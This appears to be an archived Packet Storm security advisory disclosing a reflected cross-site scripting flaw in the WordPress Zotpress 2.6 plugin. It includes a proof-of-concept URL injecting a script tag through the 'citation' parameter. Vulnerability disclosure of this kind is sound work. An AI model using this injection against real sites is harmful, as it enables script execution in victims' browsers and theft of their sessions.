WordPress Zotpress 2.6 Cross Site Scripting

2011-02-26T00:00:00
ID PACKETSTORM:98746
Type packetstorm
Reporter AutoSec Tools
Modified 2011-02-26T00:00:00

Description

                                        
                                            `------------------------------------------------------------------------  
Software................WordPress Zotpress 2.6  
Vulnerability...........Reflected Cross-site Scripting  
Download................http://katieseaborn.com/plugins/  
Release Date............2/23/2011  
Tested On...............Windows 7 + XAMPP  
------------------------------------------------------------------------  
Author..................AutoSec Tools  
Site....................http://www.autosectools.com/  
------------------------------------------------------------------------  
  
--Description--  
  
A reflected cross-site scripting vulnerability in WordPress Zotpress  
2.6 can be exploited to execute arbitrary JavaScript.  
  
  
--PoC--  
http://localhost/wordpress/wp-content/plugins/zotpress/zotpress.image.php?citation=%3cscript%3ealert(0)%3c%2fscript%3e  
`